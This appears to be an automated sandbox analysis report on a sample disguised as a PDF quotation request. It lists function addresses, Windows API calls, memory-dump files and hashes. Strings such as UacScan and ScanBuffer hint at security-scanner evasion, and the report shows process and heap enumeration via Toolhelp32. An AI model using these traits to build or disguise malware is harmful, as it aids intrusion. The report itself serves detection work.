                                                                  Function 02957D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02957DB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction ID: 158628beeb5cfa7afd5cfc70ebab1e2062d880623d7e529bbe47e278165d6dba
                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction Fuzzy Hash: FED05B723091107AD220D95E5C44EF79BDCCFC9770F100639BA58C3180D7208C018771
                                                                  Function 02957E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                  • Instruction ID: d9fe8ddb0b8547453be38665da7c14d31ffacbaab9b4cb95aaaa0ab8a4ab82ff
                                                                  • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                  • Instruction Fuzzy Hash: 55C08CE13123200A5A90E5FC0CC408A828C19841393A41B35FC38C62E2D321A89B26A0
                                                                  Function 02957E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02972A49,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,Initialize), ref: 02957E47
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                  • Instruction ID: 76c4e9713a4e37da72f82411e6978c1b0166060fc9df9c70ece08fca44eec693
                                                                  • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                  • Instruction Fuzzy Hash: B8C08CE03023240E5E90E6FC1CC42DE828E19845343A02B21EC38D61E2D31198AB2A10
                                                                  Function 02954C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction ID: e32b1b34c6e0fc4d05e61c32d1fbcadf072d466876b3967b6eaa348cc3419913
                                                                  • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                  • Instruction Fuzzy Hash: D0C012A270023447EB61DE98ECC079562DCDB85295B1410A1D808D7340E7609C404B65
                                                                  Function 02954C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  • SysReAllocStringLen.OLEAUT32(0297BE78,0296E950,000000B4), ref: 02954C62
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 344208780-0
                                                                  • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                  • Instruction ID: 90f16fdedf294cf5d3d2552e39231853714c2d66b75f34dc1a1602f931eb9d65
                                                                  • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                  • Instruction Fuzzy Hash: BFD012747001215DAB6CDE59C944A7A62BE99D0206349E65D9C064E240E7618480CB31
                                                                  Function 0297BB50 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeSetEvent.WINMM(00002710,00000000,0297BB44,00000000,00000001), ref: 0297BB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Eventtime
                                                                  • String ID:
                                                                  • API String ID: 2982266575-0
                                                                  • Opcode ID: cb288c827e4e71e96ac613c255f16affbb1ba2127e4d8a8c3dcfe10bf149dec9
                                                                  • Instruction ID: 6aff6933e83628a174d8833bec3bd1690d135b34998949e2c9f21ee92d08b7f9
                                                                  • Opcode Fuzzy Hash: cb288c827e4e71e96ac613c255f16affbb1ba2127e4d8a8c3dcfe10bf149dec9
                                                                  • Instruction Fuzzy Hash: 3EC092F0B903003EF62096A85CD2F2362CDE748B04F600816BF00EE2D1DAE288601A28
                                                                  Function 02954BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02954BEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID:
                                                                  • API String ID: 2525500382-0
                                                                  • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                  • Instruction ID: b62e5016a5f7c8486704823c2cf06b4cb244ce91a9d62670895b830cf832abc1
                                                                  • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                  • Instruction Fuzzy Hash: 21B0123CB4863228FB90DB610D00B3A009C0F90287F8520959E28CC0C0FF40C0808B33
                                                                  Function 02954BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02954C03
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                  • Instruction ID: bcc1922a6c70b6d8a266b31419264d3fb7c6da5b61d9f6b7541eb1032b56ea5c
                                                                  • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                  • Instruction Fuzzy Hash: 12A022AC3003330A8F0BEB2C800022E303B3FE03003CAC0E80C080A0008F3A8000AF30
                                                                  Function 02951682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02952000), ref: 029516A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: b95ee50c1ef65241ecfa79840254c3e741f21a4f0b68ed6b19e8311c59d86fd4
                                                                  • Instruction ID: c5a2e9bc3dff72181c9fcf1cbc6af9a1c279920cb252bed84ae8932f7f9a2592
                                                                  • Opcode Fuzzy Hash: b95ee50c1ef65241ecfa79840254c3e741f21a4f0b68ed6b19e8311c59d86fd4
                                                                  • Instruction Fuzzy Hash: DDF09AB2B457A96BD7129F5A9CC0B93FBD4FB40324F050139EA489B740D7B0A8108BD4
                                                                  Function 029516E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02951704
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 9627831dd9725bb9ec12c3296eef2034534541e626fc455f71a20ad806536851
                                                                  • Instruction ID: 58b222baec80c81052d004a0926603caabfb54588f8d7d14654c67cb947180bd
                                                                  • Opcode Fuzzy Hash: 9627831dd9725bb9ec12c3296eef2034534541e626fc455f71a20ad806536851
                                                                  • Instruction Fuzzy Hash: FBE0C275340321AFE7109B7E9D80B13BBDCEB88664F244876FA49DB281D2A0EC10CB64

                                                                  Non-executed Functions

                                                                  Function 0296A95C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0296ABE3,?,?,0296AC75,00000000,0296AD51), ref: 0296A970
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0296A988
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0296A99A
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0296A9AC
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0296A9BE
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0296A9D0
                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0296A9E2
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0296A9F4
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0296AA06
                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0296AA18
                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0296AA2A
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0296AA3C
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0296AA4E
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0296AA60
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0296AA72
                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0296AA84
                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0296AA96
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                  • API String ID: 667068680-597814768
                                                                  • Opcode ID: a544b69acab1d121b746041740af865889e4c356e2a0a9c89015b969a5ef793c
                                                                  • Instruction ID: affb630f9824e07c3f2cfc0f49133529b3f1c38de2dd1e9d281045372257a39e
                                                                  • Opcode Fuzzy Hash: a544b69acab1d121b746041740af865889e4c356e2a0a9c89015b969a5ef793c
                                                                  • Instruction Fuzzy Hash: 7F31DEB1B853309FFB01EFB4D9D9A3637EEEB86701780096AA406EF244D7B498508F51
                                                                  Function 029558B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02956BD0,02950000,0297D790), ref: 029558D1
                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029558E8
                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02955918
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 0295597C
                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559B2
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559C5
                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559D7
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000,0297D790), ref: 029559E3
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0,02950000), ref: 02955A17
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02956BD0), ref: 02955A23
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02955A45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: 907394c09c3fb5ff667667f97d889c265e91a3e99173eaaa5fb78d19d70495d6
                                                                  • Instruction ID: b51b9ebc74d05fd4174c61db1070a17943994e87bf3f869ef259b494516520fe
                                                                  • Opcode Fuzzy Hash: 907394c09c3fb5ff667667f97d889c265e91a3e99173eaaa5fb78d19d70495d6
                                                                  • Instruction Fuzzy Hash: 1D416D71E00269AFDF10DAE8CC88BDEB7BDAB48340F4545A5A948E7242D7349E44CF50
                                                                  Function 02955B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02955B94
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02955BA1
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02955BA7
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02955BD2
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C19
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C29
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02955C51
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02955C61
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02955C87
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02955C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                  • Instruction ID: f950dbd9ecc5fa78673e550fb0cd95fdfac209bab6c0b1e7afbfed07a4799e60
                                                                  • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                  • Instruction Fuzzy Hash: A0319371F4023C2AEF25D6B8CC89BDF77BD4B45380F4541E19A08E6185EA749A848F91
                                                                  Function 02957F5C Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02957F7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
